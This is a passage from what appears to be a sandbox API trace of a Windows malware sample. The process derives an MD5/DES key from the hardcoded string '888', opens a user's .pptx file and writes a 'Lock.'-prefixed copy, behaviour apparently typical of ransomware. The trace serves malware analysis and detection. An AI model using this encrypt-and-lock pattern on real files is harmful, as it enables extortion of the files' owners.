lpMsg=0x8cf248) returned 0 [0222.051] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.051] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.051] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.051] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.051] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.051] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.051] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.052] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0222.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.052] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0222.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.052] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.052] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.052] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.052] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.052] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.052] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.052] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.052] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.053] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.053] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.053] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.053] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.053] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.053] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.053] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.053] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.053] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.053] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabb48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0222.054] CryptCreateHash (in: hProv=0xa7c550, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0222.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71e88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.054] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0222.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ea8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.054] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.054] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.054] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.054] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.054] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0222.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabae8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0222.055] CryptHashData (hHash=0x9e2078, pbData=0x2a71f88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0222.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.056] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.056] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.056] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.056] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0222.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabc50, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0222.056] CryptDeriveKey (in: hProv=0xa7c550, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0222.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.057] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.057] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0222.057] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.057] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0222.057] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0222.057] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0222.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0222.057] CryptDestroyHash (hHash=0x9e2078) returned 1 [0222.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.057] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.057] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.057] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.057] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.058] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/XTyOBM6VZ0m.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\xtyobm6vz0m.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0222.058] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.059] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0222.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0222.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0222.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854e48 [0222.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.060] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0222.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854e48 | out: hHeap=0x2af0000) returned 1 [0222.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0222.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0222.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0222.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.XTyOBM6VZ0m.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.xtyobm6vz0m.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0222.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: 